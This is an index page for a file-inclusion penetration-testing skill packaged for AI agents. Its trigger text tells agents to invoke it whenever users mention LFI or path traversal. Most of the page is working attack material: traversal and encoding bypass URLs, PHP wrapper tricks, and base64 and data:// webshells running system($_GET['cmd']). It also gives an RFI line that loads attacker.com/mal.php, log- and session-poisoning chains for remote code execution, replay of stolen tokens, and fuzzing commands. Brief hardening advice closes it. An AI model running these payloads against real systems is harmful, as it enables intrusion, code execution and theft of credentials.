OpenSkillIndex← back to search

Hacktricks-skills file-inclusion-pentest

Security testing skill for identifying and exploiting Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities. Use this skill whenever you need to test for path traversal vulnerabilities, file inclusion attacks, PHP wrapper exploitation, or LFI2RCE techniques during security assessments. Trigger this skill when users mention file inclusion, path traversal, LFI, RFI, directory traversal, PHP include vulnerabilities, or need to test for arbitrary file read/write access.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/file-inclusion/SKILL.MD
source content

File Inclusion Pentesting Skill

A comprehensive guide for testing Local File Inclusion (LFI) and Remote File Inclusion (RFI) vulnerabilities during security assessments.

Quick Start

# Basic LFI test
http://example.com/index.php?page=../../../etc/passwd

# RFI test (if allow_url_include is On)
http://example.com/index.php?page=http://attacker.com/mal.php

Vulnerable PHP Functions

These functions are commonly vulnerable to file inclusion attacks:

  • require
  • require_once
  • include
  • include_once

Common Vulnerable Parameters

Test these parameter names for file inclusion vulnerabilities:

?cat={payload}
?dir={payload}
?action={payload}
?board={payload}
?date={payload}
?detail={payload}
?file={payload}
?download={payload}
?path={payload}
?folder={payload}
?prefix={payload}
?include={payload}
?page={payload}
?inc={payload}
?locate={payload}
?show={payload}
?doc={payload}
?site={payload}
?type={payload}
?view={payload}
?content={payload}
?document={payload}
?layout={payload}
?mod={payload}
?conf={payload}

Basic LFI Testing

Standard Path Traversal

# Linux
http://example.com/index.php?page=../../../etc/passwd

# Windows
http://example.com/index.php?page=../../../../../../windows/win.ini

Bypass Techniques

Non-recursive Traversal Stripping

http://example.com/index.php?page=....//....//....//etc/passwd
http://example.com/index.php?page=....\/....\/....\/etc/passwd
http://example.com/index.php?page=%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd

Null Byte Injection (PHP < 5.4)

http://example.com/index.php?page=../../../etc/passwd%00

URL Encoding Bypasses

# Double URL encoding
http://example.com/index.php?page=..%252f..%252f..%252fetc%252fpasswd

# Alternative encoding
http://example.com/index.php?page=..%c0%af..%c0%af..%c0%afetc%c0%afpasswd

# Mixed encoding
http://example.com/index.php?page=%252e%252e%252fetc%252fpasswd%00

Path Truncation (PHP < 5.3)

# Add extra characters to bypass .php append
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd......[ADD MORE]....
http://example.com/index.php?page=a/../../../../../../../../../etc/passwd/././.[ADD MORE]/././.

Filter Bypass Tricks

http://example.com/index.php?page=....//....//etc/passwd
http://example.com/index.php?page=..///////..////..//////etc/passwd
http://example.com/index.php?page=/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
http://example.com/index.php?page=/var/www/../../etc/passwd
http://example.com/index.php?page=PhP://filter

PHP Wrappers and Protocols

php://filter

Read and modify file content before inclusion:

# Read /etc/passwd with transformations
http://example.com/index.php?page=php://filter/read=string.toupper/resource=file:///etc/passwd

# Chain multiple filters
http://example.com/index.php?page=php://filter/read=string.toupper|string.rot13|string.tolower/resource=file:///etc/passwd

# Base64 decode
http://example.com/index.php?page=php://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

# Compress and encode
http://example.com/index.php?page=php://filter/zlib.deflate/convert.base64-encode/resource=file:///etc/passwd

Available filters:

  • String: 
    string.rot13
    , 
    string.toupper
    , 
    string.tolower
    , 
    string.strip_tags
  • Conversion: 
    convert.base64-encode
    , 
    convert.base64-decode
    , 
    convert.quoted-printable-encode
    , 
    convert.iconv.*
  • Compression: 
    zlib.deflate
    , 
    zlib.inflate

php://fd

Access open file descriptors:

http://example.com/index.php?page=php://fd/3
http://example.com/index.php?page=php://stdin
http://example.com/index.php?page=php://stdout
http://example.com/index.php?page=php://stderr

data://

Execute code without file storage:

# Plain text
http://example.com/index.php?page=data://text/plain,<?php system($_GET['cmd']); ?>

# Base64 encoded
http://example.com/index.php?page=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7Pz4=

Note: Requires 

allow_url_open
and 
allow_url_include
to be On.

zip:// and rar://

Extract and include from archives:

# Create payload
zip payload.zip payload.php
mv payload.zip shell.jpg

# Include from archive
http://example.com/index.php?page=zip://shell.jpg%23payload.php
http://example.com/index.php?page=rar://shell.jpg%23payload.php

Other Protocols

# expect:// (requires expect extension)
http://example.com/index.php?page=expect://id

# input:// (POST data)
curl -XPOST "http://example.com/index.php?page=php://input" --data "<?php system('id'); ?>"

# phar:// (requires .phar file)
http://example.com/index.php?page=phar:///path/to/file.phar

LFI2RCE Techniques

Via Apache/Nginx Log Files

  1. Inject PHP payload in User-Agent or GET parameter
  2. Include the access log file
# Inject payload
GET /vuln?cmd=<?php system($_GET['c']); ?> HTTP/1.1
User-Agent: <?php system($_GET['c']); ?>

# Include log
http://example.com/index.php?page=../../../var/log/apache2/access.log

# Execute
http://example.com/index.php?page=../../../var/log/apache2/access.log&c=id

Common log paths:

/var/log/apache2/access.log
/var/log/apache/access.log
/var/log/apache2/error.log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/httpd/error_log

Via PHP Sessions

  1. Set session cookie with PHP payload
  2. Include the session file
# Set malicious session
Set-Cookie: PHPSESSID=i56kgbsq9rm8ndg3qbarhsbm27

# Login with payload
login=1&user=<?php system("cat /etc/passwd");?>&pass=password

# Include session file
http://example.com/index.php?page=../../../../../../../../../var/lib/php5/sess_i56kgbsq9rm8ndg3qbarhsbm27

Via /proc/self/environ

GET /vulnerable.php?filename=../../../proc/self/environ HTTP/1.1
User-Agent: <?=phpinfo(); ?>

Via Email

# Send email with payload to user@localhost
# Include mail file
http://example.com/index.php?page=../../../var/mail/<USERNAME>
http://example.com/index.php?page=../../../var/spool/mail/<USERNAME>

Via Upload

# Upload file with embedded payload
http://example.com/index.php?page=path/to/uploaded/file.png

# Inject into image metadata for persistence

Via PHP Base64 Filter

Bypass file extension checks:

http://example.com/index.php?page=PHP://filter/convert.base64-decode/resource=data://plain/text,PD9waHAgc3lzdGVtKCRfR0VUWydjbWQnXSk7ZWNobyAnU2hlbGwgZG9uZSAhJzsgPz4+.php

Advanced Techniques

HTML-to-PDF SVG Path Traversal

For TCPDF/html2pdf vulnerabilities:

<!-- Inline SVG payload -->
<img src="data:image/svg+xml;base64,PHN2ZyB2aWV3Qm94PSIwIDAgMCAwIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmc+PGltYWdlIHhsaW5rOmhyZWY9Ii4uLy4uLy4uLy4uLy4uL3RtcC91c2VyX2ZpbGVzL3VzZXJfMS9wcml2YXRlX2ltYWdlLnBuZyIgaGVpZ2h0PSIxMDAlIiB3aWR0aD0iMTAwJSIvPjwvc3ZnPg==" />

<!-- URL encoded bypass -->
<img src="%2f..%252f..%252ftmp%252fsecret.png">

Blind Path Traversal

Use PHP filters as oracle for error-based exfiltration:

# Use UCS-4LE encoding to trigger error on correct char
# Use dechunk filter to detect hex characters
# Use convert.iconv to shift characters

Vulnerable functions: 

file_get_contents
, 
readfile
, 
finfo->file
, 
getimagesize
, 
md5_file
, 
sha1_file
, 
hash_file
, 
file
, 
parse_ini_file
, 
copy
, 
file_put_contents
, 
stream_get_contents
, 
fgets
, 
fread
, 
fgetc
, 
fgetcsv
, 
fpassthru
, 
fputs

Token Harvesting from Logs

# Read access logs
GET /vuln/asset?name=..%2f..%2f..%2f..%2fvar%2flog%2fapache2%2faccess.log HTTP/1.1

# Extract and replay tokens
GET /portalhome/?AuthenticationToken=<stolen_token> HTTP/1.1

Fuzzing and Automation

wfuzz Command

# Basic LFI fuzzing
wfuzz -c -w ./lfi2.txt --hw 0 http://10.10.10.10/nav.php?page=../../../../../../../FUZZ

# With wordlists
wfuzz -c -w /path/to/wordlist.txt http://target.com/page.php?file=FUZZ

curl with Path Preservation

curl --path-as-is -b "session=$SESSION" \
  "http://TARGET/admin/get_system_log?log_identifier=../../../../proc/self/environ" \
  --ignore-content-length -s | tr '\000' '\n'

Testing Checklist

  • Test all file/path parameters with 
    ../../../etc/passwd
  • Try different encoding schemes (URL, double-URL, hex)
  • Test PHP wrappers (php://filter, data://, zip://)
  • Attempt log file inclusion for RCE
  • Check for session file access
  • Test /proc/self/environ
  • Try null byte injection (older PHP)
  • Test path truncation techniques
  • Attempt blind LFI with error oracles
  • Check for RFI if allow_url_include is On
  • Test upload functionality for webshell placement

Hardening Recommendations

  1. Validate and sanitize all file path inputs
  2. Use allow-lists for permitted files/directories
  3. Canonicalize paths before use
  4. Disable allow_url_include and allow_url_open
  5. Run with least privilege
  6. Separate upload directories from web root
  7. Use chroot or containers to limit filesystem access
  8. Keep PHP updated (many fixes in 5.3+ and 5.4+)

References